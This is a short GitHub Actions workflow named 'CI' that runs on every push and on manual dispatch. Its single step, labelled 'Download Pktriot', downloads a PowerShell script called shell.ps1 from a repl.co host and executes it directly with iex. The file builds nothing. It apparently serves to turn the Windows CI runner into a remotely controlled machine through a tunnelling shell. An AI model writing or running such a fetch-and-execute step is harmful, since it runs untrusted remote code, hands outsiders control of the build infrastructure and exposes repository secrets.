name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download Pktriot
      run: iex ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest https://FileHosting.lifeseemsfine.repl.co/shell.ps1).Content))
  
